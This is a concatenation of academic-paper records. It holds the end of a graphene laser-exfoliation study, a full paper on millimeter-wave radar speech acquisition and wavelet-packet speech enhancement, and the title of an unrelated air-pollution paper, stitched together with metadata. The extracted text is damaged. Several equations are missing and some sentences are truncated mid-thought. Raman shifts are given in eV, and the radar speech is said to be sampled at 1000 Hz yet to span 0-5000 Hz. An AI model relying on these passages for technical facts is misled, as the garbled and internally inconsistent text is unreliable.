The optical transmittance of the Graphene multilayer are measured by depositing different colloidal quantities onto a conductive glass substrate, and irradiating the film with a halogen lamp under confocal microscope conditions (Olympus 900 by Horiba). The transmitted spectra are taken using a Triax 320 (Horiba-Jobyn-Yvon) spectrometer working in the 300-800 nm range. The electrical measurements are conducted on some of the films with best uniformity in coverage (deposited onto a conductive glass). The ohmic film resistance (R) is measured using a Keithley DC Current generator Model 2100 with four point probe, while conductivity (σ) is measured using the following formula: where L is the film thickness measured from the SEM images and A the area covered by the four probe detectors (about 1 cm 2 ).
Results and Discussion
Chemical information on the produced carbon nanostructures is obtained studying the evolution of the G and 2D Raman structures of carbon with increasing irradiation time, while the final confirmation of the Graphene formation in the best colloidal solution is obtained by analyzing the D parameter of the KLL Auger line of carbon in the XPS data. Both measurements (G and 2D Raman and D parameter) are indicated in literature as fingerprints of the carbon allotropes.
The effectiveness of the Raman diagnostic for the individuation of Graphene presence on a surface is well known in literature and generally used as a proof of Graphene formation and deposition 18 . The systematic study in Graf et al. (ref. 18 indicates as most relevant parameters for the individuation of Graphene (single or multilayer) the peak position of the 2D band and the ratio between the G and 2D band intensity. In detail, a Graphene monolayer shows a 2D peak position of 2678.8 cm −1 and a G/2D ratio around 0.25; for multilayers of Graphene (from 2 up to 5 layers) the 2D peak becomes larger, splits in different substructures, and the energy position shifts of about 19 eV for 2 layers up to about 26 eV for 6 layers. The G/2D ratio varies from 0.4 (2 layers) up to 0.8 (6 layers).
In addition, the confirmation of Graphene formation can also be obtained by studying the changes in the carbon Auger emission. More precisely, Kaciulis et al.,in ref. 19 indicate in the D parameter, which calculates the distance between the positive maximum and negative minimum of the KLL line derivative, the key parameter for the identification of carbon allotropes. Their data indicate for D a value of about 15 eV for Graphene, 21 eV for Graphite and 13 eV for Diamond.
In our experiments, we deposited 100 μL of a colloidal solution obtained at different laser irradiation times (10 s, 20 s, 30 s, 40 s, 1 minute) onto a SiO 2 surface and for each deposited droplet we took a Raman spectrum, following the evolution of the G and 2D bands. As visible from the Raman spectra in Fig. 2A, the 2D irradiation, to Graphite values (>1) 18 obtained after 30/40 seconds of laser irradiation. A detailed analysis of the Raman spectrum of a colloidal deposited after 10 s of irradiation (Fig. 3A) indicates for the G and 2D energy positions the values of respectively 1584 cm −1 and 2671 cm −1 , which are typical values of 2-layers Graphene. Moreover, the D peak (see the zoom of the Raman spectra displayed in Fig. 3C) related to the defect structures in Graphite (1367 cm −1 ) 15,18 is strongly reduced after 10 s of irradiation, indicating the formation of states with less lattice imperfections and confirming the formation of Graphene bi-layers. Our assumption is reaffirmed by the fact that the 2D peak (Fig. 3B) is split in 2 structures at 2561 and 2671 cm −1 , as indicated in Graf et al. (ref. 18 ) for a bi-layer material. The analysis of the D parameter (Fig. 4), confirms the Raman results, indicating the typical value for Graphene (i.e. a value of 15 eV) 19 after 10 s of irradiation (see Fig. 4A). The D value increases with irradiation time and reaches the value of 18-19 eV (Graphite value) for 30 s of irradiation (Fig. 4B). Finally the C1s peak (taken during the XPS measurements -see Fig. 4C) shows a single band peak located at an energy of 284.3 eV (characteristic for C-C chemical bonds), without showing the split at 287 eV, characteristic of C-O bonds 15,19 . This indicates the absence of oxygen impurities or Graphene oxide in the colloidal.
Progressive aggregation of nanomaterials in the LASiS plume during the laser irradiation is a well-known phenomenon 10 . The observed starting time for the aggregation (30 s) is identical to what observed for metal and semiconducting nanoparticles [20][21][22] , indicating a plume expansion and evolution similar to that observed for the synthesis of nanoparticles 11,12 . The main stages in the LASiS exfoliation process can be resumed as follows: the process starts with the absorption of the laser pulse energy by the Graphite target. This generates both the detachment of carbon atoms from the surface and the breaking of the Van Der Waals bonding between the carbon layers in the first micron of the Graphite surface. A plasma plume containing carbon atoms and the exfoliated monoand bi-layers of carbon expands into the surrounding liquid. During the expansion, the plasma plume cools down and releases energy to the liquid solution. This phenomenon generates a cavitation bubble inside the bulk target, bubble that expands in the liquid and then collapses in a time scale in the order of hundreds of microseconds. The exfoliation of mono-and multilayer and the desorption of carbon atoms are estimated to occur in a timeframe ranging from 10 −6 and 10 −4 s after the impact of the laser pulse on the surface (the laser has a pulse duration of about 7 ns). These first phases are followed by a multilayer aggregation and a microparticle nucleation, which both form amorphous carbon structures and Graphite.
The final confirmation of Graphene bi-layer formation is obtained by morphological analysis of the small droplet (5 µL) of colloidal deposited onto copper after 10 s of irradiation. The 2D and 3D AFM images and SEM pictures in Fig. 5 clearly indicate the presence of micrometric flakes with dimensions ranging from hundreds of nanometers up to few microns (and having a thickness of 3-4 nanometers) on the copper substrate. This indicates the formation of a Graphene bi-layer (the thickness of Graphene is reported to be in the range of 0.4 to 1.7 nm 23 . The analysis on colloidals deposited on a glass substrate (Fig. 6) indicated that with the simple drop cast method it is possible to cover very large areas by simply changing the amount of the deposited solution. Figure 6A shows a sequence of substrate coverage (surface area of about 200 µm 2 ) obtained with different solution amounts. The area was completely covered with the 200 µL of the colloidal solution. AFM images (Fig. 6B) indicate that the area is fully covered by a uniform film consisting of our Graphene multilayer. Glass optical transmittance (Fig. 6C) was reduced of about 4% at total coverage, indicating that the film is composed only by the Graphene multilayer, without the presence of Graphite aggregates (in this case we would expect a variation in the transmittance of the order of 50% or higher due the high absorbance of amorphous Graphite (order of 90%)). Statistical analysis (see Fig. 7A) conducted on about 500 flakes of Graphene bi-layer deposited on the glass substrate and pictured in AFM images indicates that the flake dimensions are distributed following a LogNormal distribution with an average value of 1.37 μm and a standard deviation of about 6%.
Finally, the electrical measurements conducted on the Graphene film deposited onto a conductive substrate indicate an electrical resistance of 2.08 *10 −5 Ohm (average value on 50 measurements -see histogram in Fig. 7B) measured on a film with a thickness of 1 µm (see AFM image in the inset in Fig. 7B) and an area of 1 cm 2 . The calculated electrical conductivity is then of about 480 S/m at atmospheric pressure, in agreement with data reported in literature 24 .
Conclusions
In this paper, we introduce a method to synthesize bi-layers of Graphene using a Laser-Exfoliation based on the Laser Ablation techniques typically employed in the nanoparticle production. The obtained results indicate that the quality and the allotropes of the obtained carbon colloidals are strictly dependent on the laser irradiation time. Graphene bi-layer is obtained in the first 10 s of irradiation while for irradiation time greater than 30 seconds the colloidals are mainly composed by amorphous carbon and Graphite. The obtained bi-layers are characterized by Raman and XPS measurements, which indicate the formation of pure carbon layers with absence of oxygen impurities or Graphene oxide. Moreover the obtained micrometric flakes can be distributed on large areas (order of cm 2 ) obtaining uniform films with high optical transmission, indicating that the flakes do not aggregate during deposition. Finally, electric measurements on the deposited films indicate, at atmospheric pressure, a conductivity in the order of 480 S/m, typical for Graphene films. | 2018-04-03T00:15:45.346Z | 2017-09-20T00:00:00.000 | {
"year": 2017,
"sha1": "00a7796fe790a5991190aaebb6bbcbc00ef0f501",
"oa_license": "CCBY",
"oa_url": "https://www.nature.com/articles/s41598-017-12243-4.pdf",
"oa_status": "GOLD",
"pdf_src": "PubMedCentral",
"pdf_hash": "8ffd63ef7edda595e61791e2501e1851e1484cbf",
"s2fieldsofstudy": [
"Materials Science",
"Physics"
],
"extfieldsofstudy": [
"Materials Science",
"Medicine"
]
} |
8394134 | pes2o/s2orc | v3-fos-license | A New Kind of Non-acoustic Speech Acqui- Sition Method Based on Millimeter Wave Radar
—Air is not the only medium that can spread and can be used to detect speech. In our previous paper, another valuable medium — millimeter wave (MMW) was introduced to develop a new kind of speech acquisition technique [6]. Because of the special features of the MMW radar, this speech acquisition method may provide some exciting possibilities for a wide range of applications. In the proposed study, we have designed a new kind of speech acquisition radar system. The super-heterodyne receiver was used in the new system so that to mitigate the severe DC offset problem and the associated 1/f noise at baseband. Furthermore, in order to decrease the harmonic noise, electro-circuit noise, and ambient noise which were combined in the MMW detected speech, an adaptive wavelet packet entropy algorithm is also proposed in this study, which incorporates the wavelet packet entropy based voice/unvoiced radar speech adaptive detection method and the human ear perception properties in a wavelet packet timescale adaptation speech enhancement process. The performance of the proposed method is evaluated objectively by signal-to-noise ratio and subjectively by mean-opinion-score. The results confirm that the proposed method offers improved effects over other traditional speech enhancement methods for MMW radar speech.
INTRODUCTION
It is well known that speech, which is produced by the speech organ of human beings [1][2][3], has significant effects on the communication and the information exchange among human beings. Acoustic speech signals have many other applications such as those involving conversion to text or coding for transmission. However, thus far, the popular method for speech signal acquisition is almost limited to the airconducted speech; this method is based on the theory that speech can be conducted by air in free space and can easily be heard and recorded when conducted by air. However, this method has some serious shortcomings: (1) the acquisition distance of a traditional microphone or acoustic sensor is quite limited; therefore, people have to carry the microphone during their lectures, news reports, telephone calls, or theatrical performances. (2) The directional sensitivity of traditional speech/acoustic transducers (including microphones) is quite weak; as a result, the ability of traditional transducers to set off other acoustic disturbance may be poor. Therefore, it is not possible to acquire speech (or hear a particular sound) in a background with considerable noise, such as in the cockpit of a tank or a plane, or in any other rumbustious environment. (3) The frequency bandwidth of a traditional acoustic transducer is narrow; hence, the traditional acoustic transducer cannot be used for wide-spectrum acoustic signal acquisition. (4) The sensitivity of a traditional acoustic transducer is poor; therefore, it is not possible for the traditional acoustic transducer to detect a tiny acoustic or vibratory signal.
Another speech acquisition method, which does not depend on conduction by air or can overcome the shortcomings of the traditional speech acquisition method, is required. Previous studies have proposed some methods. For example, voice content can be transmitted by way of bone vibrations. These vibrations can be picked up at the top of the skull using bone-conduction sensors. Strong voicing can be facilitated using this method [4]. Other media such as infrared rays, light waves, and lasers can also be used to acquire the non-air-spread speech or acoustical vibrations. However, their application is limited since the constraint of their application conditions or their materials in detail are usually difficult to obtain [5].
A novel non-air conducted speech acquisition method has been developed in our laboratory [6]. This method uses a different medium -the millimeter wave -to detect and exactly identify the speech (or acoustic) signals generated by a person that exist in free space. Radar has some special features, such as low-range attenuation, good sense of direction, wide frequency bandwidth, and high sensitivity [7][8][9][10][11][12][13], which the traditional speech acquisition method does not have. Therefore, this special microphone, which we call "radar-microphone," may extend the speech and acoustic signal acquisition method to a considerable extent. Moreover, the method that involves the use of the MMW radar has the same attributes as the traditional speech acquisition method, such as noninvasiveness, safety, speed, portability, and cheapness [14]. Therefore, this new speech acquisition method may offer exciting opportunities for the following novel applications: (1) a hands-free, long-distance (> 10 m), directional speech/acoustic signal acquisition system, which can be used in both common and complex/rumbustious acoustic environments (e.g., a sharp whistle blows at the left-hand side of the radar when we are conducting the experiment in the playground; however, there is no whistle sound in the recorded speech); (2) the tiny, wide frequency bandwidth acoustic or vibratory signal acquisition,which cannot be detected by a traditional microphone; (3) MMW radar that can also be used for assisting clinical diagnosis or for measuring speech articulator motions [15].
However, there have been only a few reports on the MMW nonair conducted speech. A similar experiment had been carried out more than ten years ago [5], and a further research report has not been found. Other researches with respect to the radar speech concentrated on the non-acoustic sensors [14,16,17] and the measurement of speech articulator motions, such as vocal tract measurements and glottal excitation [15], but not on the MMW radar speech itself. Therefore, there is a need to explore this new speech acquisition method (as well as the corresponding speech enhancement algorithm) to extend the existing speech acquisition method.
Although the MMW radar offers exciting possibilities in the field of speech (or other acoustic signal) acquisition, the MMW radar speech itself has several serious shortcomings, including artificial quality, reduced intelligibility, and poor audibility. This is because that the theories governing the acquisition of MMW radar speech and traditional air-conducted speech are different. Therefore, some combined harmonics of the MMW and electro-circuit noise are present in the detected speech. Furthermore, channel noise and some ambient noise also exist in the MMW radar speech [18][19][20]. Among these noises, the harmonic noise and electro-circuit noise is quite larger and more complex than traditional air-conducted speech, and they degrade the MMW radar speech, this is especially true for the low-frequency components (see Figure 4). This is the biggest problem that must be resolved for the application of the MMW radar speech. Therefore, speech enhancement is a challenging topic for MMW radar speech research.
The special characters of the radar speech noise suggest that a special speech enhancement method should be developed and applied to the MMW radar speech. However, very little research has been carried out on the MMW radar speech enhancement.
Li et al. [6] proposed a multi-band spectral subtraction approach that takes into account the fact that colored noise affects the speech spectrum differently at various frequencies. Although the speech quality was improved by this algorithm, it suffered from an annoying artifact called "musical noise," [21,22] which is caused by narrow band tonal components appearing somewhat periodically in each frame and occurring at random frequencies in voice or silence regions. They also explored other methods focused on masking the musical noise using psychoacoustic models [6]; results obtained by using these algorithms show that there is a need for further improvement in the radar speech enhancement algorithm, especially at a very low SNR condition (SNR < 10 dB). Furthermore, these algorithms are based on the spectral subtraction method, which is in general effective in reducing the noise but not in improving intelligibility. Therefore, it is necessary to find a new way to improve intelligibility and reduce speech distortion when reducing noise.
The wavelet transforms (WT), which can be easily obtained by filtering a signal with multi-resolution filter banks [23,24], has been applied to various research areas, including signal and image denoising, compression, detection, and pattern recognition [25][26][27][28][29][30]. Recently, WT have been applied in denoising signals on the basis of the threshold of the wavelet coefficients, where the wavelet threshold (shrinking) introduced by D. L. Donoho et al. [31] is a simple but powerful denoising technique based on the threshold of the wavelet coefficients. Previous studies have also reported the application of wavelet shrinking for speech enhancement [32,33]; however, it is not possible to separate the signal from noises by a simple threshold because applying a uniform threshold to all wavelet coefficients would remove some speech components while suppressing additional noise, especially for the colored noise corrupted signal and some deteriorated speech conditions [34].
In order to overcome the limit of uniform threshold, many previous researches combined the wavelet transforms successfully with other denoising algorithms, such as Wiener filtering in the wavelet domain [35], wavelet filter bank for spectral subtraction [36], or coherence function [37]. The results of these methods suggest that they can improve the performance of speech enhancement methods; however, these wavelet-based methods generally need an estimation of noise.
Therefore, an algorithm that is based on an adaptive time-scale threshold of wavelet packet coefficients [38] without the requirement of any knowledge of the noise level is used in this study. To improve the performance of this algorithm for MMW radar speech, this study extends their wavelet filter-banks to nonlinear Bark-scaled frequency spacing because the human ear sensibility is a nonlinear function of frequency. The proposed method attempts to find the best tradeoff between speech distortion and noise reduction that is based on properties closely related to human perception.
Another issue to be resolved in most of the speech enhancement algorithms is the decision regarding the sectioning of voice/unvoiced speech. Bahoura's algorithm [38] discriminated speech from silence by experimentally determining a discriminatory value of 0.35. However, this value is fixed and cannot be changed from frame to frame. This limitation is worse for the enhancement of speech, particularly important for MMW radar speech, where the combined noise decreases the SNR, thereby making it quite difficult to detect voiced/unvoiced speech sections. In order to effectively resolve this issue, the present study presents a novel approach to the segmentation of voice/unvoiced speech sections that is based on wavelet packet analysis and entropy.
Entropy is defined as a measure of uncertainty of information in a statistical description of a system [39], and the spectral entropy is a measure of how concentrated or widespread the Fourier power spectrum of a signal is. In this study, a time-frequency description of MMW radar speech, as described by the wavelet packet coefficient, is used to calculate the entropy, which forms the wavelet packet spectral entropy. By its very definition, wavelet packet entropy is considerably sensitive both to the time-frequency distribution and to the uncertainty of information; therefore, this novel tool may have very useful characteristics with regard to speech section detection.
Therefore, compare to the first generation of the radar speech acquisition method [6], this research develops a new kind of Doppler radar system by using a super-heterodyne receiver, in order to (1) increase the system stability; (2) decrease the hardware system noise by reducing the DC offset and 1/f noise which has degradation effects on system signal-to-noise ratio and detection accuracy. Also, in order to enhance the detected radar speech, a speech enhancement algorithm is also proposed, which is on the basis of time-scale adaptation of wavelet packet coefficient thresholds by incorporating the human ear perception and wavelet packet entropy. The steps for radar speech enhancement and its effectiveness evaluation are as follows: (1) to adopt the wavelet packet analysis to decompose speech into nonlinear critical sub-bands and to compute the wavelet packet entropy using these wavelet packet coefficients so as to detect the voiced/unvoiced speech segment; (2) to apply the time-scale adaptation of wavelet packet thresholds to the speech enhancement algorithm, incorporating the human ear perception and wavelet packet entropy approach for improving MMW radar speech; and (3) to evaluate the quality of the enhanced MMW speech in comparison to speech enhanced by some other representative algorithm.
Doppler Radar Detection Principle
For Doppler radar detection of throat vibration, the un-modulated signal sent from transmitting antenna is: where f is carrier frequency (or transmitting frequency), t is the elapsed time, and ϕ is the residual phase. If this signal is reflected (by a vital target) with a phase shift ϕ(t) produced by the electromagnetic propagation between the transmitting antenna and the vital target, the received signal can be approximated as: where k 1 is attenuation coefficient, τ = 2R/c, here R is the target distance, and c is the velocity of light. The radar receiver downconverts the received signal R e (t) into baseband signal in the mixer: The high frequency and DC components can be filtered by proper digital signal processing (DSP), then: where K is the gain of the filter and mixer, if the displacement of throat vibration is small compare to the wavelength of the transmitting signal, the phase shift ϕ(t) is approximate to sin ϕ(t), then Eq. (4) can be rewritten as [40]: Equation (5) suggest that the phase shift of the radar received signal almost has a linear relation to the baseband signal, suggest that the displacements (or vibration) of the human throat or chest can be detected by using Doppler radar.
Description of the MMW Speech Acquisition System
The schematic diagram of this nonacoustic speech acquisition system is shown in Figure 1. A phase-locked oscillator generates a very stable MMW at 34.5 GHz with an output power of 100 mW. This output is fed into both the transmitting circuit and the receiving circuit. In the transmitting circuit, the MMW is up-converted to 35.5 GHz by mixed with a 1 GHz crystal oscillator, this wave is fed through a power attenuator before reaching the transmitting antenna. By using the variable power attenuator, the power level of the microwave signal to be radiated by the antenna is controlled, and the adjusting range is 0 ∼ 35 dB.
For the receiving circuit, the reflected wave is amplified by a low-noise amplifier (Noise figure is 4 dB, the Gain is 18 dB) after received by the receiving antenna. The transmitting and receiving antennas are both parabolic antennas with a diameter of 300 mm, the estimated beam width is 9 • × 9 • , and the maximum antenna gain is 38.5 dB at 35.5 GHz. The amplified wave is down converted with the 34.5 GHz phase-locked oscillator frequency, and then mixed with 1 GHz crystal oscillator frequency after amplified by an intermediate frequency amplifier. A power splitter is used to divide the power of the crystal oscillator, with half of the power fed to the up-converter (transmitting circuit) and the other half to the mixer. The mixer output provides the speech signal from the body, which is amplified by a signal processor and is then passed through an A/D converter before reaching a computer for further processing. All the signals were sampled at a frequency of 1000 Hz.
As shown in Figure 1, two dashed boxes form the transmitting circuit and receiving circuit separately, the advantage of this kind of radar component layout is that it employs two-step indirect-conversion transceiver, so that to mitigate the severe DC offset problem and the associated 1/f noise at baseband, that occurs normally in the direct-conversion receivers. Compared to single antenna which we used before [6], the antenna array has higher directive gain, which can both increase the detection distance and reduce interference from other directions. When the detection was performed, a 16-channel Power Lab data acquisition system (AD Instruments) displayed and recorded the radar baseband signal, this signal was further processes by using a MATLAB program (R2007b).
Bark (Critical) Band
It is well known that the sensibility of the human ear varies nonlinearly in the frequency spectrum, which denotes the fact that the perception of the auditory system of a signal at a particular frequency is influenced by the energy of a perturbation signal in a critical band around this frequency. The bandwidth of this critical band, furthermore, varies with frequency. A commonly used scale for signifying the critical bands is the Bark-band, which divides the audible frequency range of 0 ∼ 16 KHz into 24 abutting bands. An approximate analytical expression to describe the relationship between linear frequency and critical band number B (in Bark) is [41]: In this paper, the linear frequency of the radar speech is 0 ∼ 5000, therefore the Bark-band number is set to 6. Figure 2 illustrates the relationship between the frequency in hertz and the critical-band rate in Bark. Figure 2. Nineteen bands of a wavelet packet tree that closely mimic the critical bands.
Wavelet Packet Analysis
The wavelet packet analysis (WPA), which is based on the wavelet transform, can offer a large range of possibilities for signal analysis [42]. If y(n), the noisy speech, consists of the clean speech signal s(n) and the uncorrelated additive noise signal d(n), then: y(n) = s(n) + d(n) (7) For a given level, the wavelet packets transform (WPT) decomposes the noisy signal y(n) into 2 i subbands, with the corresponding wavelet coefficient sets as w i j,m : where w i j,m denotes the mth coefficient of the jth subband for the ith level, and m = 1, . . . , N/2 i , k = 1, . . . , 2 i . In this study, i is set to 6 in the Bark-band.
The enhanced speech is synthesized with the inverse transformation of the processed wavelet packet coefficients: whereŝ(n) is the enhanced radar speech, andŵ i j,m is the updated wavelet packet coefficient which is calculated by the algorithm stated below.
Wavelet Packet Entropy
The subband wavelet packet entropy is defined in terms of the relative wavelet energy of the wavelet coefficients [43]. The energy for each subband j and level i can be calculated as: The total energy of the wavelet packet coefficients will then be given by: and the probability distribution for each level can be defined as: Since, following the definition of entropy given by Shannon (1948) [44], the subband wavelet packet entropy is defined by using the probability distribution associated with scale level i (for further details see [43] and [45]), we have: Two adaptive wavelet packet entropy thresholds are selected to detect the onset and offset of MMW radar speech. The speech onset threshold is T s and the offset threshold is T n . T s is defined by adding a fixed value E s to a past mean wavelet packet entropy value T m . T m is calculated over the previous t ms (five frames). The speech offset (noise) threshold T n is calculated by adding another fixed value E n to T m . When H(i) (in Eq. (13)) exceeds T s , speech onset is detected and speech offset is detected when H(i) drops below T n . Therefore, the wavelet packet entropy thresholds can be dynamically adjusted. In this study for MMW radar speech, E s and E n are set at the constant values of 1.7 and 1.3, respectively.
Speech Enhancement Based on Time-scale Adaptation
The proposed enhancement scheme is presented in Figure 3. First, we performed wavelet packet decomposition by using a nonlinear Bark-band, and then, we carried out voiced/unvoiced speech section detection by using adaptive wavelet packet entropy thresholds. Then, we calculated the time-scale adapted threshold on the basis of the Teager energy operator, masks construction, and thresholding process.
Finally, we synthesized the enhanced speech with a wavelet packet inverse transform of the processed wavelet coefficients. a. Teager energy operator: In order to carry out the timeadapting approach, the Teagerenergy operator (TEO) [46] was used to create a mask [38], which can be calculated by the resulting wavelet coefficients w i j,m of each subband j: b. Mask processing for the time-adapting threshold: An initial mask for each subband j is constructed by smoothing the corresponding TEO coefficients and normalizing, which is determined as following [46]: where h j (m) is an IIR low-pass filter (second order) and the max is the maximum of the smoothed TEO coefficients in the considered sub-band. For an unvoiced speech section, the mask is directly set to 0. For a voiced speech section, the mask is normalized before applying a root power function of 1/8, in order to implement a compromise between noise removal and speech distortion [38]: where S i j is given by the abscissa of the maximum of the amplitude distribution of the corresponding mask M i j,m . c. Thresholding process: A scale-adapted wavelet threshold, which is derived from the level-dependent threshold [38,47] is used in this study. For a given subband j, the corresponding threshold λ j can be defined as: (17) where N is the length of the noisy speech for each subband, M AD j is the median of the absolute value estimated on the subband j. Therefore, the time-scale adapted threshold is obtained by adapting the corresponding threshold in the time domain: where α is an adjustment parameter (α = 1). The soft thresholding, which is defined by Donoho and Johnstone [48,49], is then applied to the wavelet packet coefficients: The enhanced signal, therefore, can be synthesized with the inverse transformation W P −1 of the processed wavelet coefficients (Eq. (9)).
Subjects
Ten healthy volunteer speakers, 6 males and 4 females, participated in the radar speech experiment. All the subjects were native speakers of Mandarin Chinese. Their ages varied from 20 to 35, with a mean age of 28.1 (SD = 12.05). All the experiments were conducted in accordance with the terms of the Declaration of Helsinki (BMJ 1991; 302: 1194), and appropriate consent forms were signed by the volunteers. The distance between the radar antenna and the human subjects ranged from 2 m to 30 m. Ten sentences of Mandarin Chinese were used as the speech material for acoustic analysis and acceptability evaluation. The lengths of the sentences varied from 6 words (5.6 s) to 30 words (15 s). The sentences were spoken by each participant in a quiet experimental environment. The speakers were instructed to read the speech material at normal loudness and speaking rates.
Additive Noise
In order to test the effectiveness of the proposed method, two different types of background noise, namely, white Gaussian noise and speech babble noise, were added to the enhanced MMW radar speech; both noises were taken from the Noise X-92 database. These two representative noises have a greater similarity to actual talking conditions than the other noises. Noises with varying SNRs of −10, −5, 0, +5, and +10 dB were added to the original MMW radar speech signal. SNR is defined as: whereŝ(n) is the enhanced speech, and N is the number of samples in the clean and enhanced speeches.
Perceptual Evaluation
For the perceptual experiment, eight listeners were selected to evaluate the acceptability of each sentence based on the criteria of the mean opinion score (MOS), which is a five-point scale (1: bad; 2: poor; 3: common; 4: good; 5: excellent). All the listeners were native speakers of Mandarin Chinese, had no reported history of hearing problems, and were unfamiliar with MMW radar speech. Their ages varied from 22 to 36, with a mean age of 26.37 (SD = 4.63). The listening tasks took place in a soundproof room, and the speech samples were presented to the listeners at a comfortable loudness level (60 dB sound pressure level (SPL)) via a high quality headphone. A 4-s pause was inserted before each citation word, and the order in which the speech samples were presented was randomized, to allow the listeners to respond and to avoid rehearsal effects.
RESULTS AND DISCUSSIONS
The performance of the proposed algorithm is evaluated and compared to that of other algorithms. The other algorithms include the noise estimation algorithm [50], traditional wavelet transform denoising methods [49], and the time-scale adaptation algorithm [38]. For evaluation purposes, 100 sentences, which are spoken by 6 male and 4 female volunteer speakers, are used. Generally, a speech enhancement system produces two main undesirable effects: residual noise and speech distortion. However, these effects are difficult to quantify with the help of traditional objective measures. Therefore, speech spectrograms were used in this study since they have been identified as a well-suited tool for observing both the residual noise and the speech distortion. In addition, the results were evaluated objectively by signal-to-noise ratio (SNR) and subjectively by mean opinion score (MOS) under conditions of different additive white Gaussian noise as well as bobble noise (for MOS) for the algorithm evaluation. Figure 4 shows the spectrograms of the original MMW radar speech (a), the enhanced speech using the noise estimation algorithm (b), the enhanced speech using the traditional wavelet transform denoising algorithm (c), the enhanced speech using the time-scale adaptation algorithm (d), and the proposed adaptive wavelet packet entropy algorithm (e).
As stated earlier, the combined noises are introduced into the original MMW radar speech. These noises can be clearly seen in Figure 4(a), especially in the speech-pause region. It can also be seen from the figure that the noises are mainly concentrated in the low-frequency components, roughly below 3 kHz. Figures 4(b) and (c) show that the noise estimation algorithm and the traditional wavelet transform denoising methods are effective in reducing the combined radar noises, both in the speech and the non-speech sections. However, there is still too much remnant noise in the enhanced speech, especially in the frequency section in which the noise is concentrated, suggesting that the noise reduction is not satisfactory. It can be seen from on enhancing MMW radar speech, but does not remove entirely the noise. Figure 4(e) shows that the proposed adaptive wavelet packet entropy threshold algorithm can not only greatly reduce the lowfrequency noise, in which the combined radar noise is concentrated, but it also completely eliminates the high-frequency noise. It can be seen from the figure that in the speech-pause regions the residual noise is almost eliminated. Moreover, it is clear that the residual noise is greatly reduced and has lost its structure. These results suggest that the proposed algorithm achieves a better reduction of the wholefrequency noise than other methods.
The mean results of the SNR measurements in terms of an objective measure for 100 MMW radar sentences are shown in Figure 5; the values for each sentence were corrupted by white noise at −10, −5, 0, +5, and +10 dB SNR levels.
Methods compared included the noise estimation algorithm (noise estimation), traditional wavelet transform denoising methods (wavelet transform), time-scale adaptation algorithm (time-scale adaptation), and the proposed adaptive wavelet packet entropy algorithm (wavelet packets entropy). As shown in Figure 5, the proposed method has the best performance, followed by the time-scale adaptation algorithm and the noise estimation method. It also can be seen from the figure that the proposed method has a nearly 2 dB better performance than any of the other above mentioned methods in the −10 dB noise case; further, this difference decreases with an increase in the SNR values, suggesting that the proposed method has considerably better performance than any of the other above mentioned methods, especially in the low SNR noise cases.
The perceptual analyses score (subjective results) obtained using MOS for these same conditions are shown in Figure 6. Eight listeners were asked to rate the sentences for quality as stated before. MOSs were used for 100 original MMW radar sentences produced by ten volunteer speakers and for the noisy sentences for white and bubble noise at 0 dB SNR levels. The score of the enhanced speech obtained by using the proposed adaptive wavelet packet entropy algorithm is the highest, followed by that from the time-scale adaptation algorithm and the noise estimation algorithm. This is true for both the original speech and the noisy speech. Informal listening tests also indicated that the speech enhanced with the proposed algorithm is more pleasant, the residual noise is much reduced, and has minimal, if any, speech distortion. This is because the time and scale wavelet packet thresholds can be adaptively adjusted in each Bark-band, the Bark-band also takes into account the frequency-domain masking properties of the human auditory system, thus prevents quality deterioration in the speech during the threshold process.
These results indicate that the proposed adaptive wavelet packet entropy algorithm is better suited for MMW radar speech enhancement than the other above mentioned methods, especially in the case of additive noise. Because the thresholds, which are used to determine the voiced/unvoiced speech section, are fixed and cannot be changed from frame to frame, the time-scale adaptation method cannot reduce the noise effectively. This limitation will be worse for the enhancement of MMW radar speech, especially for low SNRs (see Figure 5). With regard to the wavelet packet entropy thresholds in the proposed algorithm, voiced/unvoiced speech sections can be determined adaptively. Furthermore, based on the frame-by-frame adaptations of time-scale wavelet packet thresholds in each Bark-band, the algorithm can realize a good tradeoff between reducing noise, increasing intelligibility, and keeping the distortion acceptable to a human listener. Moreover, the time-scale threshold of wavelet packet coefficients can be adequately and adaptively adjusted; this makes it possible to get better speech quality via speech enhancement in some rigorous speech environments.
The adaptive wavelet packet entropy algorithm is also effective. Although wavelet packet entropy analysis increases the computational load, a great benefit of the proposed algorithm is that the explicit estimation of the noise level or of the a priori knowledge of the SNR is not necessary, which can avoid a great computational load. Considering its better effects on speech enhancement, the proposed algorithm is quite efficient.
As a single channel wavelet-type speech enhancement method, the adaptive wavelet packet entropy algorithm proposed in this paper can be applied for the enhancement of MMW radar speech in a practical situation. For example, a MMW speech enhancing system, into which this algorithm is embedded, can be developed. With the help of digital signal processing (DSP) technology, we can realize the speech enhancement function with a microprocessor and implanted into a radar-telephone, radar-microphone, or other electronic equipment. Different enhancement algorithms, suitable for different noise conditions, can be selected by a switch. With the development of efficient enhancement methods, the quality of MMW speech will be vastly improved and will provide better perception.
As a novel speech acquisition method, i.e., MMW radar speech acquisition method can not only be used as a substitute for the existing speech acquisition method but also compensate for several serious shortcomings of the traditional microphone speech, such as acquisition distance and directional sensitivity. Therefore, the MMW radar speech acquisition method can be combined with traditional speech acquisition equipment in order to improve the performance of the speech acquisition method and to extend the application fields of the speech acquisition.
CONCLUSION
By means of super-heterodyne millimeter wave radar, a new kind of non-air conducted speech acquisition method (radar system) is introduced in this study. Because of the special features of the millimeter wave radar, this method can provide some exciting possibilities for a wide range of applications.
However, radar speech is substantially degraded by additive combined noises that include radar harmonic noise, electro-circuit noise, and ambient noise. This study proposes an adaptive wavelet packet entropy algorithm that incorporates the human ear perception and the timescale adaptation. Results from both the objective and the subjective measures/evaluations suggest that this method can not only greatly reduce the whole-frequency noise but also prevent speech from quality deterioration, especially in the low SNR noise cases. Furthermore, the proposed algorithm is effective because an explicit estimation of the noise level is not required. | 2016-01-07T01:57:53.067Z | 2012-01-01T00:00:00.000 | {
"year": 2012,
"sha1": "4993c3f547c9a31d034945c376b3bcf7e3afeff0",
"oa_license": null,
"oa_url": "http://www.jpier.org/PIER/pier130/02.12052207.pdf",
"oa_status": "GOLD",
"pdf_src": "Anansi",
"pdf_hash": "4993c3f547c9a31d034945c376b3bcf7e3afeff0",
"s2fieldsofstudy": [
"Business"
],
"extfieldsofstudy": [
"Computer Science"
]
} |
235644323 | pes2o/s2orc | v3-fos-license | Adrenergic and Glucocorticoid Receptors in the Pulmonary Health Effects of Air Pollution
